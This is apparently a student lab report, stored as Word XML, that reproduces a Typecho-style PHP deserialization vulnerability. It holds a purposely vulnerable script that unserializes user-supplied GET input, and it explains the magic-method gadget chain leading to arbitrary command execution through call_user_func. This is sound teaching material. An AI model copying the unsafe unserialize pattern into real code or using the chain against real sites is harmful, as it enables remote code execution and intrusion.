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757A" w14:textId="3656E104" w:rsidR="009E7CAC" w:rsidRDefault="009E7CAC" w:rsidP="009E7CAC">
      <w:pPr>
        <w:ind w:firstLine="560"/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</w:t>
      </w:r>
      <w:r w:rsidR="00C07C74">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>复现反序列化</w:t>
      </w:r>
      <w:r w:rsidR="00867842">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>》</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5C2F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C7BB23" w14:textId="77777777" w:rsidR="009E7CAC" w:rsidRDefault="009E7CAC" w:rsidP="009E7CAC">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLine="48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汤清云</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5C2F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 学号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">2013536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1075</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2763042F" w14:textId="77777777" w:rsidR="009E7CAC" w:rsidRPr="00BE5C2F" w:rsidRDefault="009E7CAC" w:rsidP="009E7CAC">
      <w:pPr>
        <w:ind w:firstLine="480"/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2C97B8E" w14:textId="77777777" w:rsidR="002C6140" w:rsidRDefault="009E7CAC" w:rsidP="002C6140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65BAB449" w14:textId="2C1DCE9A" w:rsidR="009E7CAC" w:rsidRPr="00D97780" w:rsidRDefault="002C6140" w:rsidP="002C614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 w:rsidR="00867842">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>复现反序列化漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A33840" w14:textId="77777777" w:rsidR="009E7CAC" w:rsidRDefault="009E7CAC" w:rsidP="009E7CAC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18EC1C62" w14:textId="3A1671C4" w:rsidR="005B0F4D" w:rsidRDefault="00397FC8" w:rsidP="00397FC8">
      <w:pPr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复现反序列化漏洞，执行其他命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A172CB8" w14:textId="6DF2B1AC" w:rsidR="002A0874" w:rsidRDefault="002A0874" w:rsidP="002A0874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实验信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37531B1D" w14:textId="253C5232" w:rsidR="002A0874" w:rsidRDefault="00C5562C" w:rsidP="00C5562C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序列化：</w:t>
      </w:r>
      <w:r>
        <w:t>将对象、数组等数据结构转化为可以储存的格式的过程。程序在运⾏时，变量的值都是储存在内容中的，程序运⾏结束，操作系统就会将内存空间收回，要想要将内存中的变量写⼊磁盘中或是通过⽹络传输，就需要对其进⾏序列化操作，序列化能将⼀个对象转换成⼀个字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517857D3" w14:textId="20F731BD" w:rsidR="00C5562C" w:rsidRPr="00C5562C" w:rsidRDefault="00C5562C" w:rsidP="00C5562C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反序列化：</w:t>
      </w:r>
      <w:r>
        <w:t>将序列化后的字符串恢复为数据结构的过程就叫做反序列化。为了能够反序列化⼀个对象，这个对象的类在执⾏反序列化的操作前必须已经定义过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463BDF20" w14:textId="7986E8E6" w:rsidR="00C5562C" w:rsidRPr="00C5562C" w:rsidRDefault="00C5562C" w:rsidP="00C5562C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PHP魔术方法：</w:t>
      </w:r>
      <w:r>
        <w:t>以__(两个下划线)开头，在特定的条件下会被调⽤，例如类的构造⽅法__construct()，它在实例化类的时候会被调⽤。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见魔术方法如下图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A1CA66" w14:textId="2EE3F285" w:rsidR="00C5562C" w:rsidRDefault="00C5562C" w:rsidP="00C5562C">
      <w:pPr>
        <w:ind w:left="42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2853F6C9" wp14:editId="12D3722C">
            <wp:extent cx="5274310" cy="2254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923C" w14:textId="629E25BA" w:rsidR="005A3D27" w:rsidRPr="005A3D27" w:rsidRDefault="005A3D27" w:rsidP="005A3D2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反序列化漏洞：</w:t>
      </w:r>
      <w:r w:rsidR="009B41F2">
        <w:t>如果传给unserialize()的参数是⽤户可控的，那么攻击者就可以通过传⼊⼀个精⼼构造的序列化字符串，利⽤PHP魔术⽅法来控制对象内部的变量甚⾄是函数</w:t>
      </w:r>
      <w:r w:rsidR="009B41F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A09D29C" w14:textId="5F1D152F" w:rsidR="00C20B6B" w:rsidRDefault="009E7CAC" w:rsidP="003410D5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0B90137F" w14:textId="3A808DA4" w:rsidR="00397FC8" w:rsidRDefault="001F3D8D" w:rsidP="00397FC8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在DW软件中添加php文件，命名为t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>ypecho.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>，代码如下：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F3D8D" w14:paraId="213E463A" w14:textId="77777777" w:rsidTr="001F3D8D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A074ABA" w14:textId="0C567706" w:rsidR="001F3D8D" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8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/*typecho.php*/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54CA8441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>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7840A4C6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>class Typecho_Db{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62FE4719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public function __construct($adapterName){</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>//构造方法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FFA7DFF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$adapterName = 'Typecho_Db_Adapter_' . $adapterName;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57C07966" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>//“.”为字符串拼接，如果</w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>$adapterName</w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>是一个对象，则字符串的拼接会调用toString方法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DFE2F20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6B6295C5" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="40189AC8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>class Typecho_Feed{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AF6BA02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private $item;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="364A9FEA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public function __toString(){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67E5AEE5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$this-&gt;item['author']-&gt;screenName;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71736DB1" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D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Pr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>//item是数组，key为author，这里访问value的screenName变量</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74440BB8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1828BC0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383832F8" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F08356D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>class Typecho_Request{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58F66E90" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="00FC6D99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private $_params = array();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F052D8B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private $_filter = array();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34B118B8" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="090E2D87" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRPr="00E62AD3" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">    public function __get($key)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>//魔术方法get，读取一个不可访问属性的值时会被调用</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FF54FFB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010A5C61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return $this-&gt;get($key);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0586A306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1928CFFC" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4DBFBB5D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public function get($key, $default = NULL)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F83BDED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0C1A02AB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switch (true) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CE51E3B" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRPr="00E62AD3" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">            case isset($this-&gt;_params[$key]):</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>//若被设置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CC59B8B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        $value = $this-&gt;_params[$key];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23ED02BB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        break;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="568E949A" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRPr="00E62AD3" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">            default:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">                         </w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>//若没被设置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36E7BB87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        $value = $default;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7311ECE0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        break;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11B94E7B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  <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D0476F7" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRPr="00E62AD3" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> //若不是数组且长度大于零</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F5490A2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$value = !is_array($value) &amp;&amp; strlen($value) &gt; 0 ? $value : $default;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A3D8BD0" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRPr="00E62AD3" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">        return $this-&gt;_applyFilter($value);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> //调用</w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>_applyFilter</w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>方法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5629993B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14E85124" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2F7D8A5A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private function _applyFilter($value)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E3161FA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4788B85E" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRPr="00E62AD3" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">        if ($this-&gt;_filter) {</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>/如果</w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>$this-&gt;_filter</w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>不为空</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6315D46C" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRPr="00E62AD3" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">            foreach ($this-&gt;_filter as $filter) {</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>//遍历</w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>$this-&gt;_filter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5783311D" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRPr="00E62AD3" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:ind w:firstLineChars="800" w:firstLine="1680"/>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>//是否为数组，若是，绑定键值对</w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>$filter, $value</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F00055E" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:ind w:firstLineChars="800" w:firstLine="1680"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>$value = is_array($value) ? array_map($filter, $value) :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EDACD34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        call_user_func($filter, $value);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AFF0680" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>//若不是，调用</w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>call_user_func</w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>，将第一个参数作为回调函数，后面的参数作为回调函数的参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34A948B3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    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D56B997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        $this-&gt;_filter = array();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="631AC965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  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15AD04FB" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRPr="00E62AD3" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">        return $value;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>//返回$value</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29A4CA21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31EB2FA0" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="268EEC96" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5416F9B4" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRPr="00E62AD3" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>//反序列化，从用户处获取了反序列化的对象，满足反序列化漏洞的基本条件，unserialize()的参数可控，这里是漏洞的入口点。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1076459C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>$config = unserialize(base64_decode($_GET['__typecho_config']));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="245935A2" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRPr="00E62AD3" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>//实例化了类Ty</w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>pecho_Db</w:t>
            </w:r>
            <w:r w:rsidRPr="00E62AD3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>，类的参数是通过反序列化得到的$config</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D6B5807" w14:textId="77777777" w:rsidR="001F3D8D" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>$db = new Typecho_Db($config['adapter']);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="349A5F14" w14:textId="6A1CC5A7" w:rsidR="001F3D8D" w:rsidRDefault="001F3D8D" w:rsidP="001F3D8D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10936143" w14:textId="7AD20E7C" w:rsidR="001F3D8D" w:rsidRDefault="00897144" w:rsidP="008E3868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利用该反序列化漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6782B3F0" w14:textId="2C970EBB" w:rsidR="00897144" w:rsidRPr="00897144" w:rsidRDefault="00897144" w:rsidP="00897144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  <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>在类Typecho_Db的构造函数中，进⾏了字符串拼接的操作 ① 在PHP魔术⽅法中，如果⼀个类被当做字符串处理，那么类中的__toString() ⽅法将会被调⽤。 ② 全局搜索，发现类Typecho_Feed中存在__toString()⽅法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1CF46D" w14:textId="24293073" w:rsidR="00897144" w:rsidRPr="00897144" w:rsidRDefault="00897144" w:rsidP="00A34B98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</w:rPr>
      </w:pPr>
      <w:r>
        <w:t>在类Typecho_Feed的__toString()⽅法中，会访问类中私有变量$item[‘author’]中的screenName</w:t>
      </w:r>
      <w:r w:rsidR="00A34B98">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:t>①如果$item[‘author’]是⼀个对象，并且该对象没有screenName属性，那么 这个对象中的__get()⽅法将会被调⽤</w:t>
      </w:r>
      <w:r w:rsidR="00A34B98">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>②在Typecho_Request类中，正好定义了__get()⽅法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AC1E37" w14:textId="5B346459" w:rsidR="00897144" w:rsidRPr="00A34B98" w:rsidRDefault="00A34B98" w:rsidP="00A34B98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</w:rPr>
      </w:pPr>
      <w:r>
        <w:t>类Typecho_Request中的__get()⽅法会返回get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:t>get()中调⽤了_applyFilter()⽅法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:t>⽽在_applyFilter()中，使⽤了PHP的call_user_function()函数，其第⼀个参数是被调⽤的函数，第⼆个参数是被调⽤的函数的参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:t>在这⾥$filter，$value都是我们可以控制的，因此可以⽤来执⾏任意系统命令。</w:t>
      </w:r>
    </w:p>
